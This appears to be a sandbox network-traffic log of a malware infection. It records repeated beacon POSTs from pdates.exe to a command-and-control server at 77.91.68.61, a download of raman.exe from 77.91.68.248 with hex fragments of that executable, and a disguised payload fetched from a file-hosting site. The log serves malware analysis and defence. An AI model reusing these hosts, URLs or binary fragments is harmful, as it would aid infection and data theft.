Jul 27, 2023 01:33:26.357636929 CEST	2931	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:26.407182932 CEST	2932	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
89	192.168.2.5	49806	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:26.584492922 CEST	2932	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:26.633224010 CEST	2932	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49725	77.91.68.248	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:02.571052074 CEST	1162	OUT	GET /fuzz/raman.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 77.91.68.248
Jul 27, 2023 01:33:02.617398024 CEST	1164	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 00 4f 43 00 e8 25 06 00 00 c3 cc cc cc cc cc 68 a0 8c 42 00 e8 af 49 01 00 59 c3 cc cc cc cc e8 e8 Data Ascii: hOC%hBIYZ8CHCUiPCbhBuIYaFFhBUIYEE)hB%IYEFhBI
Jul 27, 2023 01:33:02.617436886 CEST	1165	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:02 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Wed, 26 Jul 2023 23:06:22 GMT ETag: "16ab15-6016be5651780" Accept-Ranges: bytes Content-Length: 1485589 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 02 d9 3d 4c 46 b8 53 1f 46 b8 53 1f 46 b8 53 1f f2 24 a2 1f 4b b8 53 1f f2 24 a0 1f cb b8 53 1f f2 24 a1 1f 5e b8 53 1f c6 c3 ae 1f 44 b8 53 1f c6 c3 57 1e 55 b8 53 1f c6 c3 50 1e 51 b8 53 1f c6 c3 56 1e 74 b8 53 1f 4f c0 d0 1f 4d b8 53 1f 4f c0 c0 1f 41 b8 53 1f 46 b8 52 1f 4e b9 53 1f c8 c3 56 1e 60 b8 53 1f c8 c3 53 1e 47 b8 53 1f c8 c3 ac 1f 47 b8 53 1f c8 c3 51 1e 47 b8 53 1f 52 69 63 68 46 b8 53 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 66 a1 b9 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 21 00 7e 02 00 00 12 05 00 00 00 00 00 e0 5d 01 00 00 10 00 00 00 90 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 07 00 00 04 00 00 00 00 00 00 02 00 40 c1 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 30 2a 03 00 34 00 00 00 64 2a 03 00 50 00 00 00 00 b0 06 00 f8 df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 07 00 54 29 00 00 40 0e 03 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 b3 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 2c 02 00 00 5c 20 03 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 7d 02 00 00 10 00 00 00 7e 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e6 a6 00 00 00 90 02 00 00 a8 00 00 00 82 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 5c 03 00 00 40 03 00 00 10 00 00 00 2a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 78 01 00 00 00 a0 06 00 00 02 00 00 00 3a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 df 00 00 00 b0 06 00 00 e0 00 00 00 3c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 29 00 00 00 90 07 00 00 2a 00 00 00 1c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=LFSFSFS$KS$S$^SDSWUSPQSVtSOMSOASFRNSV`SSGSGSQGSRichFSPELfd!~]@@04dPT)@T8@,\ .text}~ `.rdata@@.data\@@.didatx:@.rsrc<@@.relocT)@B
Jul 27, 2023 01:33:02.617463112 CEST	1166	IN	Data Raw: 8e 74 b3 00 00 e8 12 56 00 00 8d 8e d0 b3 00 00 e8 bf 43 00 00 8b 86 e0 b3 00 00 3b 86 e4 b3 00 00 74 06 89 86 e4 b3 00 00 5e c3 51 51 53 55 56 8b 74 24 28 57 8b f9 85 f6 74 0c 83 7c 24 30 00 76 05 33 c0 66 89 06 8b 4c 24 1c 33 db 43 53 6a 00 8a Data Ascii: tVC;t^QQSUVt$(Wt\|$0v3fL$3CSji(D$t$l$ Uu4\|$Ut$$UWuL$CTu3_^][YYl$ tt$WSEtt$0WVSD$L$#P+
Jul 27, 2023 01:33:02.617486954 CEST	1168	IN	Data Raw: 83 39 01 75 e3 c7 01 02 00 00 00 eb db 81 ec 04 08 00 00 8d 44 24 04 68 00 04 00 00 50 e8 93 fe ff ff 84 c0 74 6d 53 55 56 6a 0d 5b 6a 0a 8d 74 24 14 5d 89 74 24 0c 57 0f b7 06 66 3b c3 74 05 66 3b c5 75 05 83 c6 02 eb ee 89 74 24 10 66 85 c0 74 Data Ascii: 9uD$hPtmSUVj[jt$]t$Wf;tf;ut$ft<SV:QYYuUV+QYYt3fD$Pj#t$u_^][UQVuuyu^VhCEuPxQD$PD$Pj!jEVt$
Jul 27, 2023 01:33:02.617511034 CEST	1169	IN	Data Raw: f6 74 0b 8b 06 0b 46 04 88 5c 24 12 75 05 c6 44 24 12 00 8b 6c 24 38 85 ed 74 08 8b 45 00 0b 45 04 75 02 32 db 84 d2 74 0a 8d 44 24 14 50 e8 ac 4d 00 00 80 7c 24 12 00 74 0c 8d 44 24 24 8b ce 50 e8 99 4d 00 00 5e 84 db 74 0c 8d 44 24 18 8b cd 50 Data Ascii: tF\$uD$l$8tEEu2tD$PM\|$tD$$PM^tD$PMD$L$#L$P#L$$PD$#Pw(B_][UQSVW~~u?tk^2ES^2~uF(V,EeEjPjv$BuB
Jul 27, 2023 01:33:02.617533922 CEST	1170	IN	Data Raw: c3 b8 01 05 00 00 c9 c3 b8 08 20 00 00 e8 8a 28 01 00 8b 84 24 14 20 00 00 8b c8 53 55 8b ac 24 18 20 00 00 c1 e9 1f 56 0f b7 f0 88 4c 24 0c 8b 5c 24 0c 89 4c 24 10 57 8b bc 24 1c 20 00 00 85 f6 0f 84 fc 00 00 00 57 e8 c2 73 01 00 89 44 24 14 59 Data Ascii: ($ SU$ VL$\$L$W$ WsD$YtLtGtB\|$PUWtz1OuD$DE\t/tfu^hD$PWh$PUtuS$PD$ PuSUW
Jul 27, 2023 01:33:02.617557049 CEST	1172	IN	Data Raw: 66 83 78 04 3f 75 09 66 39 48 06 75 03 83 c0 08 68 b0 95 42 00 50 e8 fd 8d 01 00 85 c0 59 59 0f 95 c0 c2 04 00 55 8b ec b8 00 10 00 00 e8 5e 1e 01 00 56 8b 75 08 8d 85 00 f0 ff ff 57 bf 00 08 00 00 57 56 50 e8 12 31 00 00 56 e8 1f ff ff ff 84 c0 Data Ascii: fx?uf9HuhBPYYU^VuWWVP1Vtf~tWPzWuP0uPu0_^UVt$3f9.t[S\$WBuBPQ2YYutf> sj_Yfj_Y~f>:uff9
Jul 27, 2023 01:33:02.617573977 CEST	1173	IN	Data Raw: 10 00 00 e8 a6 37 01 00 53 8b 9c 24 5c 10 00 00 55 57 8b f9 83 a7 34 10 00 00 00 80 7f 30 00 75 09 f6 c3 04 75 04 32 c0 eb 02 b0 01 56 8b f3 d1 ee f7 d6 83 e6 01 46 c1 e6 1e f6 c3 01 74 06 81 ce 00 00 00 40 c1 eb 03 f7 d3 83 e3 01 84 c0 74 03 83 Data Ascii: 7S$\UW40uu2VFt@tL$F$tjhjjSV$\|0BuOBD$D$hP$lYt8jhjjSVD$0P0BBuD$D$D$u\|$u4
Jul 27, 2023 01:33:02.617602110 CEST	1174	IN	Data Raw: 04 88 5c 24 13 75 04 88 4c 24 13 8b ac 24 44 10 00 00 85 ed 74 0c 8b 45 00 0b 45 04 88 5c 24 12 75 04 88 4c 24 12 ff b4 24 38 10 00 00 e8 72 fe ff ff 89 44 24 18 83 f8 ff 74 14 84 c3 74 10 6a 00 ff b4 24 3c 10 00 00 e8 10 01 00 00 eb 02 32 db 6a Data Ascii: \$uL$$DtEE\$uL$$8rD$ttj$<2jhjjjh@$P0BD$uHhD$8P$@hjhjjjh@D$LP0BD$\|$tD$PH\|$tD$,PG\|$tD$$
Jul 27, 2023 01:33:02.617624998 CEST	1176	IN	Data Raw: 11 0f b7 47 02 50 e8 ca 04 00 00 84 c0 74 03 8d 77 04 0f b7 47 fe 83 c7 02 8b c8 66 85 c0 75 c9 0f b7 0e 89 b4 24 14 10 00 00 33 ed 66 85 c9 0f 84 c8 00 00 00 0f b7 0e 0f b7 c9 8b fe 8b c1 66 85 c9 74 0d 66 83 7e 02 3a 75 06 8d 7e 04 0f b7 07 0f Data Ascii: GPtwGfu$3fftf~:u~P{t@GPmt2_ft'PStEtfu{ft2j.^Pt{f;ufu$;t$j]f
Jul 27, 2023 01:33:02.662504911 CEST	1177	IN	Data Raw: 01 00 00 0f 82 dd fe ff ff 83 ff ff 0f 84 b4 05 00 00 53 8b c7 8d 8d f0 bd ff ff 99 52 50 e8 41 e1 ff ff 68 02 00 20 00 e8 24 84 01 00 8b f0 89 75 4c 59 85 f6 0f 84 8b 05 00 00 68 00 00 20 00 56 8d 8d f0 bd ff ff e8 78 df ff ff 80 7d 53 00 8b c8 Data Ascii: SRPAh $uLYh Vx}SMHtMH8MPYPEHH0QWV6VaYMHuL;w3jdfFh4BP;&h}DYuVaY}Hu0]M,ETE(

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
90	192.168.2.5	49807	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:26.828284979 CEST	2933	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:26.878165007 CEST	2933	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
91	192.168.2.5	49808	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:27.029954910 CEST	2934	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:27.079129934 CEST	2934	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
92	192.168.2.5	49809	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:27.238121033 CEST	2935	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:27.286492109 CEST	2935	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
93	192.168.2.5	49810	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:27.477612019 CEST	2936	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:27.525614977 CEST	2936	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
94	192.168.2.5	49811	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:27.729799032 CEST	2937	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:27.778657913 CEST	2937	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
95	192.168.2.5	49812	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:27.936177969 CEST	2938	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:27.984731913 CEST	2938	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
96	192.168.2.5	49813	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:28.138911009 CEST	2939	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:28.186141968 CEST	2939	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
97	192.168.2.5	49814	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:28.355055094 CEST	2940	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:28.403681993 CEST	2940	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
98	192.168.2.5	49815	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:28.565356016 CEST	2941	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:28.614777088 CEST	2941	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
99	192.168.2.5	49816	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:28.773269892 CEST	2942	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:28.822515011 CEST	2942	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49854	108.181.20.35	443	C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe

Timestamp	kBytes transferred	Direction	Data
2023-07-26 23:33:41 UTC	0	OUT	GET /67ou2d.mp4 HTTP/1.1 Host: files.catbox.moe Connection: Keep-Alive
2023-07-26 23:33:41 UTC	0	IN	HTTP/1.1 200 OK Server: nginx/1.21.3 Date: Wed, 26 Jul 2023 23:33:41 GMT Content-Type: video/mp4 Content-Length: 716304 Last-Modified: Wed, 26 Jul 2023 10:42:25 GMT Connection: close ETag: "64c0f891-aee10" X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self'; Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD Accept-Ranges: bytes
2023-07-26 23:33:41 UTC	0	IN	Data Raw: 34 7b d7 20 04 3b 1b 46 cf 3f 7e dc 84 77 1d 87 39 46 ed ce 82 21 f7 39 a0 f6 ce f5 3b b8 e1 75 21 2d ba d7 32 8b f1 4a 2e 81 a4 c5 0c f4 58 a3 8a 36 0f f4 4c 1b 70 88 6d de 7d 71 29 54 b3 dd 00 29 4c 66 32 66 23 71 2f 7d ca 90 88 cd 4e b1 0b 29 c5 4f b0 b0 ca eb 47 82 a0 d7 b9 56 46 13 e0 af 59 b2 9e 04 c0 fb 09 b9 2f d4 bd 2a b9 e0 8b 99 88 d0 9e a1 c4 c6 0d 1f bd f9 49 b1 4a 71 7c aa 5f 65 c4 13 9a 26 c2 e7 35 a4 1a 49 3e b5 c6 5c e7 35 32 7f a5 10 86 f4 77 2e 84 45 05 d3 6f 62 42 4c 39 74 3f 52 0f 27 d4 62 fa e8 b4 f5 4b 63 14 8b a4 49 09 ce 9b 6b 2e 7a 57 27 ab 95 6f 84 45 d4 06 58 0b 0d dd 60 c0 da dc 8c 9e eb c2 b9 5e d9 7c a7 75 4f 9d 69 92 72 a9 f6 06 f4 82 b0 21 69 9b 3d 0b 90 ec 5a 2f b9 d2 b0 8b 57 62 24 83 f0 d8 bd 90 25 12 a7 6f 85 73 43 7a Data Ascii: 4{ ;F?~w9F!9;u!-2J.X6Lpm}q)T)Lf2f#q/}N)OGVFY/*IJq\|_e&5I>\52w.EobBL9t?R'bKcIk.zW'oEX`^\|uOir!i=Z/Wb$%osCz
